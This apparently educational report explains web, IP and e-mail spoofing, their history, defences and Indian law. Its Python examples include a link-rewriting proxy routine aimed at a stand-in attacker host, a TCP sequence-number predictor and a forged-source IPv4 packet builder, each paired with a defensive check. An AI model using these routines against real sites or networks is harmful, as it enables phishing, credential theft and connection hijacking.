
Spoofing Introduction

1. INTRODUCTION
What Is Spoofing?
Spoofing means pretending to be something you are not. In Internet terms it means pretending to be a different Internet address (or a different sender, site or host) from the one you really have in order to gain something. Web spoofing, for example, allows an attacker to create a "shadow copy" of the entire World Wide Web.
Web spoofing is a security attack that allows an adversary to observe and modify all web pages sent to the victim's machine, and to observe all information entered into forms by the victim. As originally described (against the browsers of the mid 1990s) it worked on both of the major browsers and was not prevented by "secure" connections: the attacker could observe and modify all web pages and form submissions even when the browser's "secure connection" indicator was lit, and the user saw no indication that anything was wrong. This is possible because the "secure" connection runs between the victim and the attacker's server; the lock indicator says nothing about which server the connection terminates at unless the user checks the address and the certificate.
Spoofing Attacks
In a spoofing attack, the attacker creates misleading context in order to trick the victim into making an inappropriate security-relevant decision. A spoofing attack is like a con game: the attacker sets up a false but convincing world around the victim. The victim does something that would be appropriate if the false world were real. Unfortunately, activities that seem reasonable in the false world may have disastrous effects in the real world. Spoofing attacks are possible in the physical world as well as the electronic one.
Security-relevant Decisions
By "security-relevant decision" we mean any decision a person makes that might lead to undesirable results such as a breach of privacy or unauthorized tampering with data. Deciding to divulge sensitive information, for example by typing in a password or account number, is one example of a security-relevant decision. Choosing to accept a downloaded document is another, since in many cases a downloaded document is capable of containing malicious elements that harm the person receiving it.
MIT Jaipur
Examples of spoofing:
man-in-the-middle: the attacker sniffs packets on the link between the two end points, and can therefore pretend to be one end of the connection.
routing redirect: the attacker redirects routing information from the original host to the attacker's host (another form of man-in-the-middle attack).
source routing: the attacker uses IP source routing to redirect individual packets through the attacker's host.
blind spoofing: the attacker predicts the responses of a host, allowing commands to be sent, but cannot get immediate feedback because the replies go to the spoofed address.
flooding: a SYN flood fills up the receive queue with half-open connections from random source addresses; smurf/fraggle put the victim's address in the source field, causing everyone who receives the packets to respond to the victim.
Types Of Spoofing
IP Spoofing
E-mail Spoofing
Web Spoofing
Non-Technical Spoofing
2. Web Spoofing
Web spoofing is a kind of electronic con game in which the attacker creates a convincing but false copy of the entire World Wide Web. The false Web looks just like the real one: it has all the same pages and links. However, the attacker controls the false Web, so that all network traffic between the victim's browser and the Web goes through the attacker.
Pretending to be a legitimate site: the attacker creates a convincing but false copy of the site.
Stealing personal information such as login ID, password, credit card, bank account and much more (also known as a phishing attack).
The false Web looks and feels like the real one.
The attacker controls the false Web and so can watch everything the victim does in it.
The attacker can modify the data coming from or going to the victim, destroying its integrity.
Example of Web Spoofing (figure not reproduced in this copy)
Consequences
Surveillance: The attacker can passively watch the traffic, recording which pages the victim visits and the contents of those pages. When the victim fills out a form, the entered data is transmitted to a Web server, so the attacker can record that too, along with the response sent back by the server.
Tampering: The attacker is also free to modify any of the data traveling in either direction between the victim and the Web. The attacker can modify form data submitted by the victim. For example, if the victim is ordering a product on-line, the attacker can change the product number, the quantity, or the ship-to address.
Spoofing the Whole Web
You may think it is difficult for the attacker to spoof the entire World Wide Web, but it is not. The attacker need not store the entire contents of the Web. The whole Web is available on-line; the attacker's server can just fetch a page from the real Web when it needs to provide a copy of the page on the false Web.
How the Attack Works
The key to this attack is for the attacker's Web server to sit between the victim and the rest of the Web. This kind of arrangement is called a "man in the middle attack" in the security literature.
URL Rewriting
The attacker's first trick is to rewrite all of the URLs on some Web page so that they point to the attacker's server rather than to some real server. For example, http://home.netscape.com becomes http://www.attacker.org/http://home.netscape.com. The victim's browser requests the page from www.attacker.org, since the URL starts with http://www.attacker.org. The remainder of the URL tells the attacker's server where on the Web to go to get the real document. The attacker's server rewrites the URLs in every page it fetches in the same way, so once the victim is inside the false Web every link keeps the victim there.
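The rewriting step described above, shown as an added example (this is not code from the original report or from the paper it summarizes). It takes a constructed sample page, rewrites every href/src/action so that it routes through the hypothetical proxy host www.attacker.org, and also shows the defender-side check that spots such links: a URL whose path itself begins with a second absolute URL. The host names and the sample HTML are assumptions for the example.

```python
import re
from urllib.parse import urljoin, urlsplit

# Hypothetical names: the attacker's host and the real page being mirrored.
ATTACKER = "http://www.attacker.org/"
REAL_PAGE_URL = "http://home.netscape.com/index.html"

# Constructed sample page, as the real server might return it.
SAMPLE_HTML = """<html><body>
<a href="http://home.netscape.com/download.html">Download</a>
<a href="/about.html">About</a>
<a href="products/index.html">Products</a>
<form action="https://bank.example.com/login"><input name="pw"></form>
<img src="https://bank.example.com/logo.gif">
</body></html>"""

# href/src/action attributes in either quote style.
ATTR_RE = re.compile(r'\b(href|src|action)=(["\'])(.*?)\2', re.IGNORECASE)


def rewrite_url(url: str, base: str, proxy: str = ATTACKER) -> str:
    """Turn a real URL into one that routes through the attacker's server.

    Relative links are first made absolute against the page's real URL so the
    proxy knows which real server to fetch from; links that already point at
    the proxy are left alone so a page is never double-wrapped.
    """
    absolute = urljoin(base, url)
    if absolute.startswith(proxy):
        return absolute
    if urlsplit(absolute).scheme not in ("http", "https"):
        return url  # mailto:, javascript: etc. are not fetched through the proxy
    return proxy + absolute


def rewrite_page(html: str, base: str, proxy: str = ATTACKER) -> str:
    """Rewrite every href/src/action in the page, as the attacker's server does."""
    def _sub(m: re.Match) -> str:
        attr, quote, url = m.group(1), m.group(2), m.group(3)
        return f"{attr}={quote}{rewrite_url(url, base, proxy)}{quote}"
    return ATTR_RE.sub(_sub, html)


def looks_rewritten(url: str) -> bool:
    """Defender-side check: a URL whose *path* starts with another absolute
    URL (http://www.attacker.org/http://...) is the signature of this attack."""
    return bool(re.match(r"^/https?://", urlsplit(url).path))


if __name__ == "__main__":
    rewritten = rewrite_page(SAMPLE_HTML, REAL_PAGE_URL)
    print(rewritten)
    for _attr, _quote, link in ATTR_RE.findall(rewritten):
        print(looks_rewritten(link), link)
```

Note that relative links ("/about.html", "products/index.html") are the reason the proxy must know the page's real URL: without resolving them first, the victim's browser would resolve them against www.attacker.org and the proxy would not know which real server to fetch from.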
Figure 1: An example Web transaction during a Web spoofing attack (figure not reproduced in this copy).
The victim requests a Web page. The following steps occur:
1. The victim's browser requests the page from the attacker's server.
2. The attacker's server requests the page from the real server.
3. The real server provides the page to the attacker's server.
4. The attacker's server rewrites the page.
5. The attacker's server provides the rewritten version to the victim.
"Secure" Connections Don't Help
One distressing property of this attack is that it works even when the victim requests a page via a "secure" connection. If the victim does a "secure" Web access (a Web access using the Secure Sockets Layer) in a false Web, everything will appear normal: the page will be delivered, and the secure connection indicator (usually an image of a lock or key) will be turned on. The reason is that the connection really is encrypted, but it runs between the victim and the attacker's server, which holds a valid certificate for its own name. The indicator confirms encryption, not the identity the victim had in mind; only the name in the location line or in the certificate reveals the substitution.
Starting the Attack
To start an attack, the attacker must somehow lure the victim into the attacker's false Web. There are several ways to do this. An attacker could put a link to a false Web onto a popular Web page. If the victim is using Web-enabled email, the attacker could email the victim a pointer to a false Web, or even the contents of a page in a false Web. Finally, the attacker could trick a Web search engine into indexing part of a false Web.
Completing the Illusion
The attack as described thus far is fairly effective, but it is not perfect. There is still some remaining context that can give the victim clues that the attack is going on. However, it is possible for the attacker to eliminate virtually all of the remaining clues of the attack's existence.
Such evidence is not too hard to eliminate because browsers are very customizable. The ability of a Web page to control browser behavior is often desirable, but when the page is hostile it can be dangerous.
The Status Line
The status line is a single line of text at the bottom of the browser window that displays various messages, typically about the status of pending Web transfers, including the destination of a link the mouse is resting on. Because a page's script can write to it, a hostile page can show the real site's URL there even though the link actually points into the false Web.
The Location Line
The browser's location line displays the URL of the page currently being shown. The victim can also type a URL into the location line, sending the browser to that URL. The attack as described so far causes a rewritten URL to appear in the location line, giving the victim a possible indication that an attack is in progress. The attacker can cover this by hiding the real location line and drawing a fake one, showing the expected URL, as part of the page.
Viewing the Document Source
Popular browsers offer a menu item that allows the user to examine the HTML source for the currently displayed page. A user could possibly look for rewritten URLs in the HTML source, and could therefore spot the attack.
Viewing Document Information
A related clue is available if the victim chooses the browser's "view document information" menu item. This will display information including the document's URL. As with the document source, this clue can be spoofed by replacing the browser's menu bar with a fake one whose items show what the real page would have shown. This leaves no remaining visible clues to give away the attack.
Tracing the Attacker
Some people have suggested that finding and punishing the attacker can deter this attack. It is true that the attacker's server must reveal its location in order to carry out the attack, and that evidence of that location will almost certainly be available after an attack is detected. Unfortunately, this will not help much in practice because attackers will break into the machine of some innocent person and launch the attack there. Stolen machines will be used in these attacks for the same reason most bank robbers make their getaways in stolen cars.
Remedies
Short-term Solution: In the short run, the best defense is to follow a three-part strategy:
1. disable JavaScript in your browser so the attacker will be unable to hide the evidence of the attack;
2. make sure your browser's location line is always visible;
3. pay attention to the URLs displayed on your browser's location line, making sure they always point to the server you think you're connected to.
Long-term Solution: We do not know of a fully satisfactory long-term solution to this problem. Changing browsers so they always display the location line would help, although users would still have to be vigilant and know how to recognize rewritten URLs. This is an example of a "trusted path" technique, in the sense that the browser is able to display information for the user without possible interference by untrusted parties. Modern browsers have since adopted exactly this: page content cannot hide or overdraw the address bar, and the certificate behind the lock icon names the site the connection actually terminates at, which is what the user must compare against the site they intended to reach.
3. IP Spoofing
What is IP Spoofing
An IP (Internet Protocol) address identifies a host's connection to the network. It is carried as the source address in every packet the host sends, is recorded by the sites you browse and the mail you send, and identifies your Internet service provider and your connection to anyone who looks it up.
IP spoofing is the creation of IP packets whose source address field carries a bogus address, in order to impersonate another computing system or to conceal the identity of the sender. It is a common method used by spammers and attackers to mislead others about the origin of the packets they send.
Some upper-layer protocols provide their own defense against IP spoofing. For example, TCP uses sequence numbers negotiated with the remote machine to ensure that arriving packets are part of an established connection. Since the attacker normally cannot see any reply packets (they go to the spoofed address), he has to guess the sequence number in order to hijack the connection.
How IP Spoofing Works
The Internet Protocol (IP) is used for sending and receiving data over the Internet and between computers connected to a network. Each packet that is sent carries a source IP address that is supposed to reveal where it came from. Nothing in IP itself verifies that field: the sending host writes whatever it likes into it, and routers forward on the destination address alone.
When IP spoofing is used, the source field does not name the real origin. Instead it contains a bogus IP address that makes the packet look as though it was sent by the host with that address. Any reply is sent to the bogus address, not to the attacker, unless the attacker can also intercept or redirect traffic for that address.
Why IP Spoofing is Used
IP spoofing is used to commit criminal activity online and to breach network security. Attackers use IP spoofing so they are not traced when spamming and to perpetrate denial of service attacks: attacks that involve massive amounts of traffic being sent to computers over a network in an effort to overwhelm them or the network itself. The attacker is hard to trace because the source addresses in the flood are bogus.
IP spoofing is also used to breach security measures that trust addresses, by using a bogus source address that matches one of the addresses on the target network. Where a service grants access on the basis of the source address alone (as the old Rlogin "trusted hosts" mechanism did), this removes the need for the attacker to provide a user name and password.
Brief History of IP Spoofing
The concept of IP spoofing was initially discussed in academic circles in the 1980s. In the April 1989 article entitled "Security Problems in the TCP/IP Protocol Suite", author S. M. Bellovin of AT&T Bell Labs was among the first to identify IP spoofing as a real risk to computer networks. Bellovin describes how Robert Morris, creator of the now infamous Internet Worm, worked out how TCP chose its initial sequence numbers and showed that a forged TCP packet sequence, carrying the address of a host trusted by the "victim", could be used to obtain access to the target system without a user ID or password. Another infamous attack, Kevin Mitnick's Christmas Day crack of Tsutomu Shimomura's machine, employed IP spoofing and TCP sequence prediction techniques. While the popularity of such cracks has decreased due to the demise of the services they exploited, spoofing can still be used and needs to be addressed by all security administrators.
A common misconception is that "IP spoofing" can be used to hide your IP address while surfing the Internet, chatting on-line, sending e-mail, and so forth. This is generally not true. Forging the source IP address causes the responses to be misdirected, meaning you cannot create a normal network connection. However, IP spoofing is an integral part of many network attacks that do not need to see responses (blind spoofing).
Example of IP spoofing (figure not reproduced in this copy)
Applications of IP Spoofing
Many other attacks rely on the IP spoofing mechanism. For example, the smurf attack (a form of ICMP flooding) is when an intruder sends a large number of ICMP echo requests (pings) to the broadcast address of a reflector subnet. The source addresses of these packets are spoofed to be the address of the target victim. For each packet sent by the attacker, every host on the reflector subnet responds to the target victim, thereby flooding the victim's network and causing congestion that results in a denial of service (DoS). The reflector subnet amplifies the attack by the number of hosts that answer the broadcast, which is why routers should not forward directed broadcasts arriving from outside.
Therefore, it is essential best practice to implement anti-spoofing mechanisms to prevent IP spoofing wherever feasible.
Anti-spoofing control measures should be implemented at every point in the network where practical, but they are usually most effective at the borders between large address blocks or between domains of network administration.
Spoofing Attacks
There are a few variations on the types of attacks that successfully employ IP spoofing. Although some are relatively dated, others are very pertinent to current security concerns.
Non-Blind Spoofing
This type of attack takes place when the attacker is on the same subnet as the victim. The sequence and acknowledgement numbers can be sniffed, eliminating the potential difficulty of calculating them accurately. The biggest threat of spoofing in this instance is session hijacking. This is accomplished by corrupting the data stream of an established connection, then re-establishing it, based on the correct sequence and acknowledgement numbers, with the attack machine. Using this technique, an attacker can effectively bypass any authentication that took place when the connection was built.
Blind Spoofing
This is a more sophisticated attack, because the sequence and acknowledgement numbers cannot be observed. In order to circumvent this, several packets are sent to the target machine in order to sample sequence numbers. While not the case today, machines in the past used basic techniques for generating sequence numbers (typically a counter advanced by a fixed amount per second and per connection). It was relatively easy to discover the exact formula by studying packets and TCP sessions. Today, most OSs implement randomized sequence number generation (for example by adding a keyed hash of the connection's addresses and ports to the clock), making them difficult to predict accurately. If, however, the sequence number is compromised, data can be sent to the target. Several years ago, many machines used host-based authentication services (e.g. Rlogin). A properly crafted attack could add the requisite data to a system (e.g. a new user account) blindly, enabling full access for the attacker who was impersonating a trusted host.
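The sequence-number sampling described above, as an added example that is not part of the original report. It models two initial-sequence-number (ISN) generators: a 4.2BSD-style counter (fixed increment per second and per connection) and an RFC 6528-style generator (clock plus a keyed hash of the connection 4-tuple). The blind attacker samples two ISNs from connections it opens itself, then predicts the ISN the target will hand to a connection that appears to come from a trusted host. The addresses, ports, increments and secret are constructed values for the example; the legacy increments follow the 4.2BSD scheme, the hash scheme follows RFC 6528 in shape but uses SHA-256 as a stand-in.

```python
import hashlib
import struct

MASK32 = 0xFFFFFFFF


class LegacyIsnGenerator:
    """4.2BSD-style generator: the ISN counter advances by a fixed amount per
    second and per connection, so two samples reveal the whole sequence."""
    PER_SECOND = 128
    PER_CONNECTION = 64

    def __init__(self, start: int = 0):
        self.counter = start

    def isn(self, now: int, src: str, dst: str, sport: int, dport: int) -> int:
        # The address tuple is ignored: only time and connection count matter.
        value = (self.counter + now * self.PER_SECOND) & MASK32
        self.counter = (self.counter + self.PER_CONNECTION) & MASK32
        return value


class Rfc6528IsnGenerator:
    """ISN = M + F(src, dst, sport, dport, secret): M is a clock, F a keyed hash
    of the 4-tuple, so samples taken on the attacker's own connections say
    nothing about the offset used for the trusted host's tuple."""

    def __init__(self, secret: bytes):
        self.secret = secret

    def isn(self, now: int, src: str, dst: str, sport: int, dport: int) -> int:
        m = (now * 250_000) & MASK32  # 4 microsecond clock, as in RFC 6528
        tuple_bytes = f"{src}|{dst}|{sport}|{dport}".encode()
        digest = hashlib.sha256(self.secret + tuple_bytes).digest()
        f = struct.unpack(">I", digest[:4])[0]
        return (m + f) & MASK32


def predict_next_isn(samples, predict_at: int, per_second: int = 128) -> int:
    """Blind attacker's predictor for the legacy scheme.

    samples: [(time, isn), ...] from connections the attacker opened itself.
    Returns the ISN the target will hand to the *next* connection opened at
    time predict_at, whoever opens it."""
    (t1, s1), (t2, s2) = samples[-2:]
    per_connection = (s2 - s1 - (t2 - t1) * per_second) & MASK32
    return (s2 + per_connection + (predict_at - t2) * per_second) & MASK32


def run_attack(generator, predict_at: int = 11):
    """Attacker samples two ISNs for its own tuple, predicts, then the trusted
    host's tuple is used for the spoofed connection. Returns (predicted, actual)."""
    attacker = ("203.0.113.7", "198.51.100.10", 40000, 513)  # constructed (RFC 5737 space)
    trusted = ("192.0.2.25", "198.51.100.10", 1023, 513)     # constructed
    samples = [(10, generator.isn(10, *attacker)),
               (10, generator.isn(10, *attacker))]
    predicted = predict_next_isn(samples, predict_at)
    actual = generator.isn(predict_at, *trusted)
    return predicted, actual


if __name__ == "__main__":
    print("legacy  (predicted, actual):", run_attack(LegacyIsnGenerator()))
    print("rfc6528 (predicted, actual):", run_attack(Rfc6528IsnGenerator(b"per-boot secret")))
```

Against the legacy generator the prediction is exact, so the attacker can complete the three-way handshake without ever seeing the SYN/ACK. Against the hashed generator the two samples are identical (same tuple, same second) and the prediction is off by an unknown 32-bit offset, which is the whole point of RFC 6528: the per-tuple offset can only be learned by observing the target's traffic for that tuple.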
Man in the Middle Attack
Both types of spoofing are forms of a common security violation known as a man in the middle (MITM) attack. In these attacks, a malicious party intercepts a legitimate communication between two friendly parties. The malicious host then controls the flow of communication and can eliminate or alter the information sent by one of the original participants without the knowledge of either the original sender or the recipient. In this way, an attacker can fool a victim into disclosing confidential information by "spoofing" the identity of the original sender, who is presumably trusted by the recipient.
Denial of Service Attack
IP spoofing is almost always used in what is currently one of the most difficult attacks to defend against: denial of service attacks, or DoS. Since the attackers are concerned only with consuming bandwidth and resources, they need not worry about properly completing handshakes and transactions. Rather, they wish to flood the victim with as many packets as possible in a short amount of time. In order to prolong the effectiveness of the attack, they spoof source IP addresses to make tracing and stopping the DoS as difficult as possible. When multiple compromised hosts are participating in the attack, all sending spoofed traffic, it is very challenging to block it quickly.

ADVANTAGES
The same address rewriting that an attacker abuses has legitimate uses when your own gateway does it (network address translation):
Multiple Servers:
Sometimes you want to change where packets heading into your network will go. Frequently this is because you have only one IP address, but you want people to be able to get into the boxes behind the one with the "real" IP address.
Transparent Proxying:
Sometimes you want to pretend that each packet which passes through your Linux box is destined for a program on the Linux box itself. This is used to make transparent proxies: a proxy is a program which stands between your network and the outside world, shuffling communication between the two. The transparent part is because your network won't even know it's talking to a proxy, unless of course the proxy doesn't work.
DISADVANTAGES
Blind to Replies:
A drawback of IP source address spoofing is that reply packets go back to the spoofed IP address rather than to the attacker. This is fine for many types of attack packet. However, in a scanning attack the attacker may need to see the replies; in such cases the attacker cannot use IP address spoofing.
Serial Attack Platforms:
The attacker can still maintain anonymity by taking over a chain of attack hosts. The attacker attacks the target victim using a point host, the last host in the attack chain. Even if the authorities learn the point host's identity, they might not be able to track the attack through the chain of attack hosts all the way back to the attacker's base host.
Prevention
1. Use authentication based on key exchange between the machines on your network; something like IPsec will significantly cut down on the risk of spoofing, because a forged source address cannot produce a valid authentication tag.
2. Use an access control list to deny private IP addresses (RFC 1918 ranges and other bogons) on your downstream interface.
3. Implement filtering of both inbound and outbound traffic: ingress filtering as described in BCP 38 (RFC 2827), and egress filtering so that your own hosts cannot be used to spoof others.
4. Configure your routers and switches, if they support such configuration, to reject packets originating from outside your local network that claim to originate from within.
5. Enable encrypted sessions on your router so that trusted hosts that are outside your network can securely communicate with your local hosts.
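An added example (not code from the original report) covering both "How IP Spoofing Works" and prevention items 2 to 4 above: it builds a raw IPv4 header with an arbitrary source address, which is all spoofing amounts to at the packet level, then applies a BCP 38 style border filter to it. The address plan (192.0.2.0/24 as the internal network, other RFC 5737 documentation ranges as outside hosts) and the bogon list are assumptions for the example; the header layout and checksum follow RFC 791.

```python
import ipaddress
import struct

# Constructed address plan for the example (RFC 5737 documentation ranges).
INTERNAL_PREFIXES = [ipaddress.ip_network("192.0.2.0/24")]
BOGON_PREFIXES = [ipaddress.ip_network(p) for p in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",  # RFC 1918 private
    "127.0.0.0/8", "0.0.0.0/8", "169.254.0.0/16",     # loopback, "this net", link-local
)]


def ipv4_checksum(header: bytes) -> int:
    """One's-complement sum of 16-bit words (RFC 791). Over a header that
    already carries a correct checksum the result is 0."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack(f">{len(header) // 2}H", header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4(src: str, dst: str, proto: int = 6, payload: bytes = b"") -> bytes:
    """Build a minimal 20-byte IPv4 header. Nothing stops the caller putting
    any address at all in `src`: that field is never verified by IP itself."""
    vihl, tos, total_len = 0x45, 0, 20 + len(payload)
    ident, flags_frag, ttl = 0x1234, 0, 64
    hdr = struct.pack(">BBHHHBBH4s4s", vihl, tos, total_len, ident, flags_frag,
                      ttl, proto, 0,
                      ipaddress.ip_address(src).packed, ipaddress.ip_address(dst).packed)
    csum = ipv4_checksum(hdr)
    return hdr[:10] + struct.pack(">H", csum) + hdr[12:] + payload


def header_checksum_ok(packet: bytes) -> bool:
    ihl = (packet[0] & 0x0F) * 4
    return ipv4_checksum(packet[:ihl]) == 0


def parse_ipv4(packet: bytes) -> dict:
    """Return the fields a filter needs; refuses a header with a bad checksum."""
    if not header_checksum_ok(packet):
        raise ValueError("bad IPv4 header checksum")
    src, dst = struct.unpack(">4s4s", packet[12:20])
    return {"src": ipaddress.ip_address(src), "dst": ipaddress.ip_address(dst),
            "ttl": packet[8], "proto": packet[9]}


def ingress_verdict(packet: bytes, arrived_on_external: bool) -> str:
    """BCP 38 style anti-spoofing at the network border.

    External interface: drop anything claiming an internal or bogon source
    (prevention items 2 and 4). Internal interface: drop anything whose source
    is not ours, so our hosts cannot be used to spoof others (item 3)."""
    src = parse_ipv4(packet)["src"]
    is_internal = any(src in net for net in INTERNAL_PREFIXES)
    is_bogon = any(src in net for net in BOGON_PREFIXES)
    if arrived_on_external:
        return "DROP" if (is_internal or is_bogon) else "ACCEPT"
    return "ACCEPT" if is_internal else "DROP"


if __name__ == "__main__":
    # A packet from outside claiming to be one of our own hosts: the classic case.
    spoofed = build_ipv4("192.0.2.25", "192.0.2.10")
    print(parse_ipv4(spoofed)["src"], ingress_verdict(spoofed, arrived_on_external=True))
    legit = build_ipv4("198.51.100.7", "192.0.2.10")
    print(parse_ipv4(legit)["src"], ingress_verdict(legit, arrived_on_external=True))
```

The filter never needs to know who really sent a packet; it only needs to know which source prefixes can legitimately arrive on which interface. That is why the text says such controls work best at administrative borders: that is where the set of legitimate prefixes per interface is small and well known.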
4. E-Mail Spoofing
Definition:
E-mail spoofing is the forgery of an e-mail header so that the message appears to have originated from someone or somewhere other than the actual source.
Email spoofing is the creation of email messages with a forged sender address, something which is simple to do because the core protocols do no authentication. Spam and phishing emails typically use such spoofing to mislead the recipient about the origin of the message.
A number of measures to address spoofing are available, including SPF, Sender ID, DKIM and DMARC. Although their use is increasing, it is likely that almost half of all domains still do not have such measures in place. However, as of 2013, 60% of consumer mailboxes worldwide use DMARC to protect themselves against direct domain spoofing [4], and only 8.6% of emails have no form of domain authentication.
Technical Detail
When an SMTP email is sent, the initial connection provides two pieces of address information:
MAIL FROM: generally presented to the recipient as the Return-Path: header but not normally visible to the end user, and by default no checks are done that the sending system is authorized to send on behalf of that address.
RCPT TO: specifies which email address the email is delivered to; it is not normally visible to the end user but may be present in the headers as part of the "Received:" header.
Together these are sometimes referred to as the "envelope" addressing, by analogy with a traditional paper envelope.
Once the receiving mail server signals that it accepted these two items, the sending system sends the "DATA" command, and typically sends several header items, including:
From: Joe Q Doe <joeqdoe@example.com> - the address visible to the recipient; but again, by default no checks are done that the sending system is authorized to send on behalf of that address.
Reply-to: Jane Roe <jane.roe@example.mil> - similarly not checked.
The result is that the email recipient sees the email as having come from the address in the From: header; they may sometimes be able to find the MAIL FROM address; and if they reply to the email it will go to either the address presented in the MAIL FROM: or the Reply-to: header. None of these addresses is reliable by itself. SPF checks the connecting server's IP address against the domain in MAIL FROM, DKIM signs selected headers and the body with the sending domain's key, and DMARC ties either result to the visible From: domain and tells receivers what to do when neither check passes.
Furthermore the mail server may not check that these domains have been registered in the DNS and are configured to receive emails. This may generate backscatter if a reply is generated.
Use by Spam and Worms
Malware such as Klez and Sober, and many more modern examples, often search for email addresses within the computer they have infected, and use those addresses both as targets for email and to create credible forged From fields in the emails that they send, so that these emails are more likely to be opened. For example:
1. Alice is sent an infected email which she opens, running the worm code.
2. The worm code searches Alice's address book and finds the addresses of Bob and Charlie.
3. From Alice's computer, the worm sends an infected email to Bob, but forged to appear to have been sent by Charlie.
In this case, even if Bob's system detects the incoming mail as containing malware, he sees the source as being Charlie, while Alice remains unaware of the actual infection.
Fooling the Media
It has happened that the media printed false stories based on spoofed e-mails. In October 2013, an e-mail which looked like it was from the Swedish company Fingerprint Cards was sent to a news agency, saying that Samsung had offered to purchase the company. The news spread and the share price surged by 50%. But the e-mail was from someone else.
It has also happened that people and companies have been scandalized by spoofed e-mail sent to newspapers.
Example of Email spoofing (figure not reproduced in this copy)
Prevention
Don't click links in emails; instead copy and paste, or better still manually type the URL in.
When entering personal or sensitive information, verify the URL is as you expect and that the site's SSL certificate matches that URL.
Look at the Received: headers of the email. Only the topmost one, added by your own mail server, can be trusted; the IP address recorded there is the host that actually delivered the message, and it can be compared with the sending domain's published SPF record. If an email claims to originate from inside your network, the delivering host should be one of your own mail servers.
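An added example (not code from the original report) serving both the "Technical Detail" section and the header-inspection advice above. It takes a constructed raw message in which the envelope sender (Return-Path), the visible From: and the Reply-To: all disagree, extracts the delivering host's IP from the topmost Received: header, evaluates a simplified SPF record for the MAIL FROM domain, and reports whether the From: domain is aligned with it, which is the question DMARC asks. The SPF records, the message and the relay names are constructed; the SPF evaluator handles only ip4: mechanisms and all, a deliberate subset of RFC 7208, and org_domain is a crude stand-in for the Public Suffix List.

```python
import ipaddress
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed SPF records standing in for DNS TXT lookups (example domains only).
SPF_RECORDS = {
    "example.com": "v=spf1 ip4:192.0.2.0/24 -all",
    "example.net": "v=spf1 ip4:198.51.100.0/24 ~all",
}

# Constructed message: envelope sender and From: disagree, and the delivering
# host (203.0.113.50) is outside the sender domain's published SPF range.
RAW_MESSAGE = """\
Return-Path: <bulk@example.net>
Received: from mail.example.net (mail.example.net [203.0.113.50])
\tby mx.victim.example (Postfix) with ESMTP id 1A2B3C
\tfor <bob@victim.example>; Mon, 01 Jan 2024 09:00:00 +0000
From: Joe Q Doe <joeqdoe@example.com>
Reply-To: Jane Roe <jane.roe@example.mil>
To: bob@victim.example
Subject: Urgent payment

Please wire the invoice amount today.
"""

RECEIVED_IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
SPF_RESULT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def domain_of(addr_header) -> str:
    """Domain part of an address header such as 'Joe Q Doe <joeqdoe@example.com>'."""
    _, addr = parseaddr(addr_header or "")
    return addr.rpartition("@")[2].lower()


def connecting_ip(msg):
    """IP the last relay saw. The topmost Received: header is the one our own
    MX added, so it is the only one an attacker cannot have forged."""
    received = msg.get_all("Received") or []
    if not received:
        return None
    m = RECEIVED_IP_RE.search(received[0])
    return m.group(1) if m else None


def check_spf(domain: str, ip: str) -> str:
    """Simplified SPF: ip4: mechanisms and 'all' only (RFC 7208 also has a, mx,
    include, redirect ...). Returns pass/fail/softfail/neutral/none."""
    record = SPF_RECORDS.get(domain)
    if not record or not record.startswith("v=spf1"):
        return "none"
    addr = ipaddress.ip_address(ip)
    for term in record.split()[1:]:
        qualifier = term[0] if term[0] in "+-~?" else "+"
        mech = term.lstrip("+-~?")
        if mech.startswith("ip4:"):
            matched = addr in ipaddress.ip_network(mech[4:], strict=False)
        else:
            matched = mech == "all"
        if matched:
            return SPF_RESULT[qualifier]
    return "neutral"


def org_domain(domain: str) -> str:
    # Crude stand-in for the Public Suffix List: keep the last two labels.
    return ".".join(domain.split(".")[-2:])


def evaluate(raw: str) -> dict:
    """What a receiver can learn from one message: the addresses presented,
    which one SPF actually vouches for, and whether the visible From: is
    aligned with it (relaxed DMARC alignment on the organizational domain)."""
    msg = message_from_string(raw)
    ip = connecting_ip(msg)
    mail_from = domain_of(msg.get("Return-Path"))
    header_from = domain_of(msg.get("From"))
    spf = check_spf(mail_from, ip) if ip else "none"
    aligned = org_domain(mail_from) == org_domain(header_from)
    return {"ip": ip, "mail_from": mail_from, "header_from": header_from,
            "reply_to": domain_of(msg.get("Reply-To")), "spf": spf,
            "from_aligned": aligned, "dmarc_pass": spf == "pass" and aligned}


if __name__ == "__main__":
    for key, value in evaluate(RAW_MESSAGE).items():
        print(f"{key:13} {value}")
```

For the constructed message the user would see "Joe Q Doe" at example.com, a reply would go to example.mil, SPF is evaluated for example.net (softfail, since the delivering host is not in its record), and the From: domain is not aligned with anything that was authenticated: exactly the situation in which a receiver applying a DMARC reject policy for example.com would refuse the message.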
5. Non-Technical Spoofing
These non-computer based techniques are commonly referred to as social engineering. This can be as simple as the attacker calling someone on the phone and claiming to be a certain person.
Example of non-technical spoofing (figure not reproduced in this copy)
Why Does Non-Technical Spoofing Work?
The main reason is that it exploits attributes of human behavior: trust is good and people love to talk. Most people assume that if someone is nice and pleasant, he must be honest. If an attacker can sound sincere and listen, you would be amazed at what people will tell him.
6. Laws and Punishment
Cyber crimes can involve criminal activities that are traditional in nature, such as theft, fraud, forgery, defamation and mischief, all of which are subject to the Indian Penal Code. The abuse of computers has also given birth to a gamut of new-age crimes that are addressed by the Information Technology Act, 2000.
We can categorize cyber crimes in two ways:
The computer as a target: using a computer to attack other computers, e.g. hacking, virus/worm attacks, DoS attacks etc.
The computer as a weapon: using a computer to commit real-world crimes, e.g. cyber terrorism, IPR violations, credit card frauds, EFT frauds, pornography etc.
Cyber crime is regulated by cyber laws or Internet laws.
Law and Punishment for Spoofing
Under the Information Technology (Amendment) Act, 2008, Section 66-D applies, and Sections 418, 419 and 465 of the Indian Penal Code, 1860 are also applicable. The spoofing offence is cognizable, bailable, compoundable with permission of the court before which the prosecution of such offence is pending, and triable by any magistrate.
